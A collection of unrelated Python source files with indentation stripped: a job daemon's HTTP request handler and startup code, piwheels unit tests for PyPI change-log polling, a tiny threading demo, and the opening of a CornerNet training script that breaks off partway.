elif path[0] == 'abort':
tokill = list(children)
print('Force abort', tokill)
for child in tokill:
os.killpg(child, signal.SIGKILL)
self.do_response(200, 'text/json', {'killed': len(tokill)})
elif path==['submit']:
if self.ctrl.broken:
self.do_response(500, "text/json", {'broken': self.ctrl.broken, 'error': 'Broken methods: ' + ', '.join(sorted(m.split('.')[-1][2:] for m in self.ctrl.broken))})
elif 'xml' in args:
self.do_response(500, 'text/plain', 'JSON > XML!\n' )
elif 'json' in args:
if DEBUG_WRITE_JSON:
with open('DEBUG_WRITE.json', 'wb') as fh:
fh.write(args['json'])
setup = json_decode(args['json'])
data = job_tracking.get(setup.get('subjob_cookie') or None)
if not data:
self.do_response(500, 'text/plain', 'bad subjob_cookie!\n' )
return
if len(job_tracking) - 1 > 5: # max five levels
print('Too deep subjob nesting!')
self.do_response(500, 'text/plain', 'Too deep subjob nesting')
return
if data.lock.acquire(False):
respond_after = True
try:
if self.DEBUG: print('@daemon.py: Got the lock!', file=sys.stderr)
jobidv, job_res = self.ctrl.initialise_jobs(setup)
job_res['done'] = False
if jobidv:
error = []
tlock = TLock()
link2job = {j['link']: j for j in job_res['jobs'].values()}
def run(jobidv, tlock):
for jobid in jobidv:
passed_cookie = None
# This is not a race - all higher locks are locked too.
while passed_cookie in job_tracking:
passed_cookie = gen_cookie()
job_tracking[passed_cookie] = DotDict(lock=JLock(), last_error=None, last_time=0)
try:
self.ctrl.run_job(jobid, subjob_cookie=passed_cookie, parent_pid=setup.get('parent_pid', 0))
# update database since a new jobid was just created
job = self.ctrl.add_single_jobid(jobid)
with tlock:
link2job[jobid]['make'] = 'DONE'
link2job[jobid]['total_time'] = job.total
except JobError as e:
error.append([e.jobid, e.method, e.status])
with tlock:
link2job[jobid]['make'] = 'FAIL'
return
finally:
del job_tracking[passed_cookie]
# everything was built ok, update symlink
try:
wn = self.ctrl.current_workspace
dn = self.ctrl.workspaces[wn].path
ln = os.path.join(dn, wn + "-LATEST_")
try:
os.unlink(ln)
except OSError:
pass
os.symlink(jobid, ln)
os.rename(ln, os.path.join(dn, wn + "-LATEST"))
except Exception:
pass # meh
t = Thread(target=run, name="job runner", args=(jobidv, tlock,))
t.daemon = True
t.start()
t.join(2) # give job two seconds to complete
with tlock:
for j in link2job.values():
if j['make'] in (True, 'FAIL',):
respond_after = False
job_res_json = json_encode(job_res)
break
if not respond_after: # not all jobs are done yet, give partial response
self.do_response(200, "text/json", job_res_json)
t.join() # wait until actually complete
del tlock
del t
# verify that all jobs got built.
total_time = 0
for j in link2job.values():
jobid = j['link']
if j['make'] == True:
# Well, crap.
error.append([jobid, "unknown", {"INTERNAL": "Not built"}])
print("INTERNAL ERROR IN JOB BUILDING!", file=sys.stderr)
total_time += j.get('total_time', 0)
data.last_error = error
data.last_time = total_time
except Exception as e:
if respond_after:
self.do_response(500, "text/json", {'error': str(e)})
raise
finally:
data.lock.release()
if respond_after:
job_res['done'] = True
self.do_response(200, "text/json", job_res)
if self.DEBUG: print("@daemon.py: Process releases lock!", file=sys.stderr) # note: has already done http response
else:
self.do_response(200, 'text/plain', 'Busy doing work for you...\n')
else:
self.do_response(500, 'text/plain', 'Missing json input!\n' )
else:
self.do_response(500, 'text/plain', 'Unknown path\n' )
return
def parse_args(argv):
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--debug', action='store_true')
parser.add_argument('--config', default='../conf/framework.conf', metavar='CONFIG_FILE', help='Configuration file')
group = parser.add_mutually_exclusive_group()
group.add_argument('--port', type=int, help='Listen on tcp port')
group.add_argument('--socket', help='Listen on unix socket', default='socket.dir/default')
return parser.parse_args(argv)
def exitfunction(*a):
signal.signal(signal.SIGTERM, signal.SIG_IGN)
signal.signal(signal.SIGINT, signal.SIG_IGN)
print()
print('The daemon deathening! %d %s' % (os.getpid(), children,))
print()
for child in children:
os.killpg(child, signal.SIGKILL)
os.killpg(os.getpgid(0), signal.SIGKILL)
os._exit(1) # we really should be dead already
def check_socket(fn):
dn = os.path.dirname(fn)
try:
os.mkdir(dn, 0o750)
except OSError:
pass
try:
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.connect(fn)
except socket.error:
try:
assert S_ISSOCK(os.lstat(fn).st_mode), fn + " exists as non-socket"
os.unlink(fn)
except OSError:
pass
return
raise Exception("Socket %s already listening" % (fn,))
def siginfo(sig, frame):
print_status_stacks()
def main(options):
# all forks belong to the same happy family
try:
os.setpgrp()
except OSError:
print("Failed to create process group - there is probably already one (daemontools).", file=sys.stderr)
# Set a low (but not too low) open file limit to make
# dispatch.update_valid_fds faster.
# The runners will set the highest limit they can
# before actually running any methods.
r1, r2 = resource.getrlimit(resource.RLIMIT_NOFILE)
r1 = min(r1, r2, 1024)
resource.setrlimit(resource.RLIMIT_NOFILE, (r1, r2))
# setup statmsg sink and tell address using ENV
statmsg_rd, statmsg_wr = socket.socketpair(socket.AF_UNIX, socket.SOCK_DGRAM)
os.environ['BD_STATUS_FD'] = str(statmsg_wr.fileno())
def buf_up(fh, opt):
sock = socket.fromfd(fh.fileno(), socket.AF_UNIX, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, opt, 256 * 1024)
buf_up(statmsg_wr, socket.SO_SNDBUF)
buf_up(statmsg_rd, socket.SO_RCVBUF)
CONFIG = configfile.get_config(options.config, verbose=False)
t = Thread(target=statmsg_sink, args=(CONFIG['logfilename'], statmsg_rd), name="statmsg sink")
t.daemon = True
t.start()
# do all main-stuff, i.e. run server
sys.stdout = autoflush.AutoFlush(sys.stdout)
sys.stderr = autoflush.AutoFlush(sys.stderr)
atexit.register(exitfunction)
signal.signal(signal.SIGTERM, exitfunction)
signal.signal(signal.SIGINT, exitfunction)
signal.signal(signal.SIGUSR1, siginfo)
signal.siginterrupt(signal.SIGUSR1, False)
if hasattr(signal, 'SIGINFO'):
signal.signal(signal.SIGINFO, siginfo)
signal.siginterrupt(signal.SIGINFO, False)
if options.port:
server = ThreadedHTTPServer(('', options.port), XtdHandler)
daemon_url = 'http://localhost:%d' % (options.port,)
else:
check_socket(options.socket)
# We want the socket to be world writeable, protect it with dir permissions.
u = os.umask(0)
server = ThreadedUnixHTTPServer(options.socket, XtdHandler)
os.umask(u)
daemon_url = configfile.resolve_socket_url(options.socket)
ctrl = control.Main(options, daemon_url)
print()
ctrl.print_workspaces()
print()
XtdHandler.ctrl = ctrl
for n in ("result_directory", "source_directory", "urd"):
print("%16s: %s" % (n.replace("_", " "), CONFIG.get(n),))
print()
if options.port:
serving_on = "port %d" % (options.port,)
else:
serving_on = options.socket
print("Serving on %s\n" % (serving_on,), file=sys.stderr)
server.serve_forever()
if __name__ == "__main__":
# sys.path needs to contain .. (the project dir), put it after accelerator
sys.path.insert(1, os.path.dirname(sys.path[0]))
options = parse_args(sys.argv[1:])
main(options)
|
test_pypi.py
|
# The piwheels project
# Copyright (c) 2017 Ben Nuttall <https://github.com/bennuttall>
# Copyright (c) 2017 Dave Jones <dave@waveform.org.uk>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from time import sleep
from unittest import mock
from random import randint
from datetime import datetime, timezone
from threading import Thread
from socketserver import ThreadingMixIn
from http.server import HTTPServer, BaseHTTPRequestHandler
from xmlrpc.server import SimpleXMLRPCServer, SimpleXMLRPCRequestHandler
from xmlrpc.client import ProtocolError
from urllib.parse import urlsplit
from queue import Queue
import pytest
import http.client
import xmlrpc.client
import simplejson as json
from requests.exceptions import RequestException
from simplejson.errors import JSONDecodeError
from piwheels.master.pypi import *
UTC = timezone.utc
def dt(s):
return datetime.strptime(s, '%Y-%m-%d %H:%M:%S').replace(tzinfo=UTC)
@pytest.fixture()
def mock_requests():
# XXX Delete me?
with mock.patch('piwheels.master.pypi.requests') as requests:
yield requests
@pytest.fixture()
def mock_logger(request):
with mock.patch('piwheels.master.pypi.logger') as logger:
yield logger
@pytest.fixture()
def xml_server(request):
q = Queue()
def changelog_since_serial(n):
return [
(pkg, ver, ts, msg, index)
for index, (pkg, ver, ts, msg) in enumerate(q.get(), start=n + 1)
]
class ThreadedXMLRPCServer(ThreadingMixIn, SimpleXMLRPCServer):
pass
xml_server = ThreadedXMLRPCServer(("127.0.0.1", 8000))
xml_server.register_introspection_functions()
xml_server.register_function(changelog_since_serial)
xml_server_thread = Thread(target=xml_server.serve_forever)
xml_server_thread.daemon = True
xml_server_thread.start()
yield "http://127.0.0.1:8000/", q
xml_server.shutdown()
xml_server.server_close()
@pytest.fixture()
def mock_buffer(request):
with mock.patch('piwheels.master.pypi.PyPIBuffer') as buffer_proxy:
events = []
buffer_proxy().__iter__.return_value = events
yield events
@pytest.fixture()
def mock_json_server(request):
with mock.patch('piwheels.master.pypi.requests.get') as get:
packages = {}
def mock_get(url, timeout=None):
url = urlsplit(url)
if url.path.endswith('/json'):
package = url.path.rsplit('/', 2)[1]
try:
if package == 'pypi-err':
return mock.Mock(status_code=503)
else:
description = packages[package]
except KeyError:
return mock.Mock(status_code=404)
else:
if package == 'pypi-bad':
return mock.Mock(status_code=200, json=mock.Mock(
return_value={'info': {}}))
else:
return mock.Mock(status_code=200, json=mock.Mock(
return_value={'info': {'summary': description}}))
else:
return mock.Mock(status=404)
get.side_effect = mock_get
yield packages
def test_pypi_buf_talks_to_servers(xml_server):
xml_url, xml_queue = xml_server
# NOTE: Must use a serial after PYPI_EPOCH here to permit events thru,
# and we must include at least 5 minutes worth of events
buf = PyPIBuffer(pypi_xmlrpc=xml_url, serial=PYPI_EPOCH + 1000)
buf._transport.use_https = False
xml_queue.put([
('bla', '0.0', 1531320000, 'create'),
] * PYPI_MARGIN + [
('foo', '0.1', 1531327388, 'create'),
('foo', '0.1', 1531327389, 'add source file foo-0.1.tar.gz'),
('bar', '1.0', 1531328389, 'create'),
('bar', '1.0', 1531328390, 'add py2.py3 file bar-1.0-py2.py3-none-any.whl'),
('baz', '2.0', 1531329389, 'create'),
('baz', '2.0', 1531329390, 'add py2.py3 file baz-1.0-py2.py3-none-any.whl'),
])
# baz events aren't included in output because they've not "aged" for
# 5 minutes
assert list(buf) == [
('bla', '0.0', 1531320000, 'create', PYPI_EPOCH + 1000),
('foo', '0.1', 1531327388, 'create', PYPI_EPOCH + 1001),
('foo', '0.1', 1531327389, 'add source file foo-0.1.tar.gz', PYPI_EPOCH + 1002),
('bar', '1.0', 1531328389, 'create', PYPI_EPOCH + 1003),
('bar', '1.0', 1531328390, 'add py2.py3 file bar-1.0-py2.py3-none-any.whl', PYPI_EPOCH + 1004),
]
def test_pypi_buf_returns_empty_before_epoch(xml_server):
# See notes in prior test
xml_url, xml_queue = xml_server
buf = PyPIBuffer(pypi_xmlrpc=xml_url, serial=0)
buf._transport.use_https = False
xml_queue.put([
('bla', '0.0', ts, 'create')
for ts in range(1531320000, 1531320000 + 1000)
])
# Nothing returned because it's all before the PYPI_EPOCH
assert list(buf) == []
def test_pypi_buf_returns_empty_before_serial(xml_server):
xml_url, xml_queue = xml_server
# Make sure we're beyond the epoch, even accounting for the amount
# PyPIBuffer jumps back by (the margin)
i = PYPI_EPOCH + PYPI_MARGIN + 1000
buf = PyPIBuffer(pypi_xmlrpc=xml_url, serial=i)
buf._transport.use_https = False
xml_queue.put([
('bla', '0.0', 1531320000, 'create'),
] * (PYPI_MARGIN - 1))
# Nothing returned yet because PyPIBuffer has jumped backwards PYPI_MARGIN
# events
assert list(buf) == []
xml_queue.put([
('foo', '0.1', 1531327388, 'create'),
('foo', '0.1', 1531327389, 'add source file foo-0.1.tar.gz'),
('bar', '1.0', 1531328389, 'create'),
('bar', '1.0', 1531328390, 'add py2.py3 file bar-1.0-py2.py3-none-any.whl'),
('baz', '2.0', 1531329389, 'create'),
('baz', '2.0', 1531329390, 'add py2.py3 file baz-1.0-py2.py3-none-any.whl'),
])
assert list(buf) == [
('foo', '0.1', 1531327388, 'create', i),
('foo', '0.1', 1531327389, 'add source file foo-0.1.tar.gz', i + 1),
('bar', '1.0', 1531328389, 'create', i + 2),
('bar', '1.0', 1531328390, 'add py2.py3 file bar-1.0-py2.py3-none-any.whl', i + 3),
]
def test_pypi_buf_waits_for_more_events(xml_server):
xml_url, xml_queue = xml_server
# Make sure we're beyond the epoch, even accounting for the amount
# PyPIBuffer jumps back by (the margin)
i = PYPI_EPOCH + PYPI_MARGIN + 1000
buf = PyPIBuffer(pypi_xmlrpc=xml_url, serial=i)
buf._transport.use_https = False
xml_queue.put([
('bla', '0.0', 1531320000, 'create'),
] * (PYPI_MARGIN - 1))
# Nothing yet because of PYPI_MARGIN (see prior test)
assert list(buf) == []
xml_queue.put([
('foo', '0.1', 1531327388, 'create'),
('foo', '0.1', 1531327389, 'add source file foo-0.1.tar.gz'),
])
# Nothing yet because even though we've pushed the event it's waiting for,
# it's not 5 minutes "old" yet
assert list(buf) == []
xml_queue.put([
('bar', '1.0', 1531328389, 'create'),
('bar', '1.0', 1531328390, 'add py2.py3 file bar-1.0-py2.py3-none-any.whl'),
('baz', '2.0', 1531329389, 'create'),
('baz', '2.0', 1531329390, 'add py2.py3 file baz-1.0-py2.py3-none-any.whl'),
])
assert list(buf) == [
('foo', '0.1', 1531327388, 'create', i),
('foo', '0.1', 1531327389, 'add source file foo-0.1.tar.gz', i + 1),
('bar', '1.0', 1531328389, 'create', i + 2),
('bar', '1.0', 1531328390, 'add py2.py3 file bar-1.0-py2.py3-none-any.whl', i + 3),
]
def test_pypi_buf_raises_errors():
class BadXMLHandler(BaseHTTPRequestHandler):
def do_POST(self):
self.send_error(404, 'Function not found')
class BadXMLRPCServer(ThreadingMixIn, HTTPServer):
pass
server = BadXMLRPCServer(("127.0.0.1", 8000), BadXMLHandler)
server_thread = Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
try:
buf = PyPIBuffer(pypi_xmlrpc='http://127.0.0.1:8000/')
buf._transport.use_https = False
with pytest.raises(ProtocolError):
list(buf)
finally:
server.shutdown()
server.server_close()
def test_pypi_read_normal(mock_buffer, mock_json_server):
mock_buffer[:] = [
('foo', '0.1', 1531327388, 'create', 0),
('foo', '0.1', 1531327388, 'add source file foo-0.1.tar.gz', 1),
('bar', '1.0', 1531327389, 'create', 2),
('bar', '1.0', 1531327389, 'add py2.py3 file bar-1.0-py2.py3-none-any.whl', 3),
('baz', '1.0', 1531327390, 'create', 4),
('baz', '1.0', 1531327390, 'add py2.py3 file baz-1.0-py2.py3-none-any.whl', 5),
]
mock_json_server['foo'] = 'package foo'
mock_json_server['bar'] = 'package bar'
mock_json_server['baz'] = None
events = PyPIEvents()
assert list(events) == [
('foo', None, dt('2018-07-11 16:43:08'), 'create', 'package foo'),
('foo', '0.1', dt('2018-07-11 16:43:08'), 'source', 'package foo'),
('bar', None, dt('2018-07-11 16:43:09'), 'create', 'package bar'),
('bar', '1.0', dt('2018-07-11 16:43:09'), 'create', 'package bar'),
('baz', None, dt('2018-07-11 16:43:10'), 'create', ''),
('baz', '1.0', dt('2018-07-11 16:43:10'), 'create', ''),
]
def test_pypi_read_json_err(mock_buffer, mock_json_server):
mock_buffer[:] = [
('foo', '0.1', 1531327388, 'create', 0),
('foo', '0.1', 1531327388, 'add source file foo-0.1.tar.gz', 1),
('pypi-err', '1.0', 1531327389, 'create', 2),
('pypi-err', '1.0', 1531327389, 'add py2.py3 file bar-1.0-py2.py3-none-any.whl', 3),
]
mock_json_server['foo'] = 'package foo'
mock_json_server['pypi-err'] = 'pypi broke'
events = PyPIEvents()
assert list(events) == [
('foo', None, dt('2018-07-11 16:43:08'), 'create', 'package foo'),
('foo', '0.1', dt('2018-07-11 16:43:08'), 'source', 'package foo'),
('pypi-err', None, dt('2018-07-11 16:43:09'), 'create', None),
('pypi-err', '1.0', dt('2018-07-11 16:43:09'), 'create', None),
]
def test_pypi_read_json_bad(mock_buffer, mock_json_server):
mock_buffer[:] = [
('foo', '0.1', 1531327388, 'create', 0),
('foo', '0.1', 1531327388, 'add source file foo-0.1.tar.gz', 1),
('pypi-bad', '1.0', 1531327389, 'create', 2),
('pypi-bad', '1.0', 1531327389, 'add py2.py3 file bar-1.0-py2.py3-none-any.whl', 3),
]
mock_json_server['foo'] = 'package foo'
mock_json_server['pypi-bad'] = 'pypi broke'
events = PyPIEvents()
assert list(events) == [
('foo', None, dt('2018-07-11 16:43:08'), 'create', 'package foo'),
('foo', '0.1', dt('2018-07-11 16:43:08'), 'source', 'package foo'),
('pypi-bad', None, dt('2018-07-11 16:43:09'), 'create', None),
('pypi-bad', '1.0', dt('2018-07-11 16:43:09'), 'create', None),
]
def test_pypi_read_missing_description(mock_buffer, mock_json_server):
mock_buffer[:] = [
('foo', '0.1', 1531327388, 'create', 0),
('foo', '0.1', 1531327388, 'add source file foo-0.1.tar.gz', 1),
('bar', '1.0', 1531327389, 'create', 2),
('bar', '1.0', 1531327389, 'add py2.py3 file bar-1.0-py2.py3-none-any.whl', 3),
]
mock_json_server['foo'] = 'package foo'
events = PyPIEvents()
assert list(events) == [
('foo', None, dt('2018-07-11 16:43:08'), 'create', 'package foo'),
('foo', '0.1', dt('2018-07-11 16:43:08'), 'source', 'package foo'),
('bar', None, dt('2018-07-11 16:43:09'), 'create', None),
('bar', '1.0', dt('2018-07-11 16:43:09'), 'create', None),
]
def test_pypi_read_huge_description(mock_buffer, mock_json_server):
mock_buffer[:] = [
('foo', '0.1', 1531327388, 'create', 0),
('foo', '0.1', 1531327388, 'add source file foo-0.1.tar.gz', 1),
('bar', '1.0', 1531327389, 'create', 2),
('bar', '1.0', 1531327389, 'add py2.py3 file bar-1.0-py2.py3-none-any.whl', 3),
]
mock_json_server['foo'] = 'package foo'
mock_json_server['bar'] = 'bar' * 1000
expected = ('bar' * 1000)[:199] + '…'
events = PyPIEvents()
assert list(events) == [
('foo', None, dt('2018-07-11 16:43:08'), 'create', 'package foo'),
('foo', '0.1', dt('2018-07-11 16:43:08'), 'source', 'package foo'),
('bar', None, dt('2018-07-11 16:43:09'), 'create', expected),
('bar', '1.0', dt('2018-07-11 16:43:09'), 'create', expected),
]
def test_pypi_ignore_other_events(mock_buffer, mock_json_server):
mock_buffer[:] = [
('foo', '0.1', 1531327388, 'create', 0),
('foo', '0.1', 1531327388, 'add source file foo-0.1.tar.gz', 1),
('bar', '1.0', 1531327389, 'create', 2),
('bar', '1.0', 1531327389, 'add py2.py3 file bar-1.0-py2.py3-none-any.whl', 3),
('bar', '1.0', 1531327392, 'foo', 4),
('bar', '1.0', 1531327392, 'foo bar baz', 5),
]
mock_json_server['foo'] = 'package foo'
mock_json_server['bar'] = 'package bar'
events = PyPIEvents()
assert list(events) == [
('foo', None, dt('2018-07-11 16:43:08'), 'create', 'package foo'),
('foo', '0.1', dt('2018-07-11 16:43:08'), 'source', 'package foo'),
('bar', None, dt('2018-07-11 16:43:09'), 'create', 'package bar'),
('bar', '1.0', dt('2018-07-11 16:43:09'), 'create', 'package bar'),
]
def test_pypi_cache_expunge(mock_buffer, mock_json_server):
mock_buffer[:] = [
('foo', '0.1', 1531327388, 'create', 0),
('foo', '0.1', 1531327388, 'add source file foo-0.1.tar.gz', 1),
('bar', '1.0', 1531327389, 'create', 2),
('bar', '1.0', 1531327389, 'add py2.py3 file bar-1.0-py2.py3-none-any.whl', 3),
]
mock_json_server['foo'] = 'package foo'
mock_json_server['bar'] = 'package bar'
events = PyPIEvents(cache_size=1)
assert list(events) == [
('foo', None, dt('2018-07-11 16:43:08'), 'create', 'package foo'),
('foo', '0.1', dt('2018-07-11 16:43:08'), 'source', 'package foo'),
('bar', None, dt('2018-07-11 16:43:09'), 'create', 'package bar'),
('bar', '1.0', dt('2018-07-11 16:43:09'), 'create', 'package bar'),
]
assert ('foo', '0.1') not in events._versions
assert ('bar', '1.0') in events._versions
def test_pypi_ignore_dupes(mock_buffer, mock_json_server):
mock_buffer[:] = [
('foo', '0.1', 1531327388, 'create', 0),
('foo', '0.1', 1531327388, 'add source file foo-0.1.tar.gz', 1),
('bar', '1.0', 1531327389, 'create', 2),
('bar', '1.0', 1531327389, 'add source file bar-1.0.tar.gz', 3),
('bar', '1.0', 1531327389, 'add source file bar-1.0.zip', 4),
('bar', '1.0', 1531327392, 'add cp34 file bar-0.1-cp34-cp34-manylinux1_x86_64.whl', 5),
('bar', '1.0', 1531327392, 'add cp35 file bar-0.1-cp35-cp35-manylinux1_x86_64.whl', 6),
]
mock_json_server['foo'] = 'package foo'
mock_json_server['bar'] = 'package bar'
events = PyPIEvents()
assert list(events) == [
('foo', None, dt('2018-07-11 16:43:08'), 'create', 'package foo'),
('foo', '0.1', dt('2018-07-11 16:43:08'), 'source', 'package foo'),
('bar', None, dt('2018-07-11 16:43:09'), 'create', 'package bar'),
('bar', '1.0', dt('2018-07-11 16:43:09'), 'source', 'package bar'),
]
def test_pypi_promote_binary_to_source(mock_buffer, mock_json_server):
mock_buffer[:] = [
('foo', '0.1', 1531327388, 'create', 0),
('foo', '0.1', 1531327388, 'add source file foo-0.1.tar.gz', 1),
('bar', '1.0', 1531327389, 'create', 2),
('bar', '1.0', 1531327390, 'add cp34 file bar-0.1-cp34-cp34-manylinux1_x86_64.whl', 3),
('bar', '1.0', 1531327390, 'add cp35 file bar-0.1-cp35-cp35-manylinux1_x86_64.whl', 4),
('bar', '1.0', 1531327392, 'add source file bar-1.0.tar.gz', 5),
('bar', '1.0', 1531327392, 'add source file bar-1.0.zip', 6),
]
mock_json_server['foo'] = 'package foo'
mock_json_server['bar'] = ''
events = PyPIEvents()
assert list(events) == [
('foo', None, dt('2018-07-11 16:43:08'), 'create', 'package foo'),
('foo', '0.1', dt('2018-07-11 16:43:08'), 'source', 'package foo'),
('bar', None, dt('2018-07-11 16:43:09'), 'create', ''),
('bar', '1.0', dt('2018-07-11 16:43:10'), 'create', ''),
# Note the timestamp doesn't alter as the release time is the
# earliest release
('bar', '1.0', dt('2018-07-11 16:43:10'), 'source', ''),
]
def test_pypi_ignore_removes(mock_buffer, mock_json_server):
mock_buffer[:] = [
('foo', '0.1', 1531327388, 'create', 0),
('foo', '0.1', 1531327388, 'add source file foo-0.1.tar.gz', 1),
('foo', '0.1', 1531327388, 'remove Owner foo', 2),
]
mock_json_server['foo'] = 'package foo'
events = PyPIEvents()
assert list(events) == [
('foo', None, dt('2018-07-11 16:43:08'), 'create', 'package foo'),
('foo', '0.1', dt('2018-07-11 16:43:08'), 'source', 'package foo'),
]
def test_pypi_remove_version(mock_buffer, mock_json_server):
mock_buffer[:] = [
('foo', '0.1', 1531327388, 'create', 0),
('foo', '0.1', 1531327388, 'add source file foo-0.1.tar.gz', 1),
('foo', '0.1', 1531327388, 'remove project', 2),
]
mock_json_server['foo'] = 'package foo'
events = PyPIEvents()
assert list(events) == [
('foo', None, dt('2018-07-11 16:43:08'), 'create', 'package foo'),
('foo', '0.1', dt('2018-07-11 16:43:08'), 'source', 'package foo'),
('foo', '0.1', dt('2018-07-11 16:43:08'), 'remove', None),
]
def test_pypi_remove_package(mock_buffer, mock_json_server):
mock_buffer[:] = [
('foo', '0.1', 1531327388, 'create', 0),
('foo', '0.1', 1531327388, 'add source file foo-0.1.tar.gz', 1),
('foo', None, 1531327388, 'remove release', 2),
]
mock_json_server['foo'] = 'package foo'
events = PyPIEvents()
assert list(events) == [
('foo', None, dt('2018-07-11 16:43:08'), 'create', 'package foo'),
('foo', '0.1', dt('2018-07-11 16:43:08'), 'source', 'package foo'),
('foo', None, dt('2018-07-11 16:43:08'), 'remove', None),
]
def test_pypi_yank_version(mock_buffer, mock_json_server):
mock_buffer[:] = [
('foo', '0.1', 1531327388, 'yank release', 0),
]
events = PyPIEvents()
assert list(events) == [
('foo', '0.1', dt('2018-07-11 16:43:08'), 'yank', None),
]
def test_pypi_unyank_version(mock_buffer, mock_json_server):
mock_buffer[:] = [
('foo', '0.1', 1531327388, 'unyank release', 0),
]
events = PyPIEvents()
assert list(events) == [
('foo', '0.1', dt('2018-07-11 16:43:08'), 'unyank', None),
]
def test_pypi_backoff(mock_buffer, mock_json_server):
mock_buffer[:] = [
('foo', '0.1', 1531327388, 'create', 0),
('foo', '0.1', 1531327388, 'add source file foo-0.1.tar.gz', 1),
('bar', '1.0', 1531327389, 'create', 2),
('bar', '1.0', 1531327389, 'add py2.py3 file bar-1.0-py2.py3-none-any.whl', 3),
]
mock_json_server['foo'] = 'package foo'
mock_json_server['bar'] = ''
events = PyPIEvents()
assert list(events) == [
('foo', None, dt('2018-07-11 16:43:08'), 'create', 'package foo'),
('foo', '0.1', dt('2018-07-11 16:43:08'), 'source', 'package foo'),
('bar', None, dt('2018-07-11 16:43:09'), 'create', ''),
('bar', '1.0', dt('2018-07-11 16:43:09'), 'create', ''),
]
mock_buffer[:] = []
assert list(events) == []
mock_buffer[:] = [
('bar', '1.1', 1531327392, 'create', 4),
('bar', '1.1', 1531327393, 'add source file bar-1.1.tar.gz', 5),
]
# Because 10 seconds haven't elapsed...
assert list(events) == []
def test_pypi_read_improper_state():
with mock.patch('xmlrpc.client.ServerProxy') as proxy:
proxy().changelog_since_serial.side_effect = (
http.client.ImproperConnectionState('Something went horribly wrong')
)
events = PyPIEvents()
assert list(events) == []
def test_pypi_read_server_error():
with mock.patch('xmlrpc.client.ServerProxy') as proxy:
proxy().changelog_since_serial.side_effect = (
xmlrpc.client.ProtocolError('Something else went wrong',
500, '', '')
)
events = PyPIEvents()
assert list(events) == []
def test_pypi_read_client_error():
with mock.patch('xmlrpc.client.ServerProxy') as proxy:
proxy().changelog_since_serial.side_effect = (
xmlrpc.client.ProtocolError('Client did something stupid',
400, '', '')
)
events = PyPIEvents()
with pytest.raises(xmlrpc.client.ProtocolError):
list(events)
|
test_script.py
|
import threading as th
import time
class Flag:
def __init__(self, status=True, data=[]):
self.status = status
self.data = data
def toggle(self):
self.status = not self.status
def counter(flag):
while 1:
if len(flag.data) == 10:
print('Lista llena')
flag.data = []
time.sleep(TIME)
def appender(flag):
while 1:
flag.data.append(1)
print(f'Appendeando, con largo {len(flag.data)}')
time.sleep(TIME)
TIME = .5
flag = Flag()
counter_thr = th.Thread(target=counter, args=[flag])
appender_thr = th.Thread(target=appender, args=[flag])
counter_thr.start()
appender_thr.start()
|
train.py
|
#!/usr/bin/env python
import os
import json
import torch
import numpy as np
import queue
import pprint
import random
import argparse
import importlib
import threading
import traceback
from tqdm import tqdm
from utils import stdout_to_tqdm
from config import system_configs
from nnet.py_factory import NetworkFactory
from torch.multiprocessing import Process, Queue, Pool
from db.datasets import datasets
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
def parse_args():
parser = argparse.ArgumentParser(description="Train CornerNet")
parser.add_argument("cfg_file", help="config file", type=str)
parser.add_argument("--iter", dest="start_iter",
help="train at iteration i",
default=0, type=int)
parser.add_argument("--threads", dest="threads", default=4, type=int)
args = parser.parse_args()
return args
def prefetch_data(db, queue, sample_data, data_aug):
ind = 0
print("start prefetching data...")
np.random.seed(os.getpid())
while True:
try:
data, ind = sample_data(db, ind, data_aug=data_aug)
queue.put(data)
except Exception as e:
traceback.print_exc()
raise e
def pin_memory(data_queue, pinned_data_queue, sema):
while True:
data = data_queue.get()
data["xs"] = [x.pin_memory() for x in data["xs"]]
data["ys"] = [y.pin_memory() for y in data["ys"]]
pinned_data_queue.put(data)
if sema.acquire(blocking=False):
return
def init_parallel_jobs(dbs, queue, fn, data_aug):
tasks = [Process(target=prefetch_data, args=(db, queue, fn, data_aug)) for db in dbs]
for task in tasks:
task.daemon = True
task.start()
return tasks
def train(training_dbs, validation_db, start_iter=0):
learning_rate = system_configs.learning_rate
max_iteration = system_configs.max_iter
pretrained_model = system_configs.pretrain
snapshot = system_configs.snapshot
val_iter = system_configs.val_iter
display = system_configs.display
decay_rate = system_configs.decay_rate
stepsize = system_configs.stepsize
# getting the size of each database
training_size = len(training_dbs[0].db_inds)
validation_size = len(validation_db.db_inds)
# queues storing data for training
training_queue = Queue(system_configs.prefetch_size)
validation_queue = Queue(5)
# queues storing pinned data for training
pinned_training_queue = queue.Queue(system_configs.prefetch_size)
pinned_validation_queue = queue.Queue(5)
# load data sampling function
data_file = "sample.{}".format(training_dbs[0].data)
sample_data = importlib.import_module(data_file).sample_data
# allocating resources for parallel reading
training_tasks = init_parallel_jobs(training_dbs, training_queue, sample_data, True)
if val_iter:
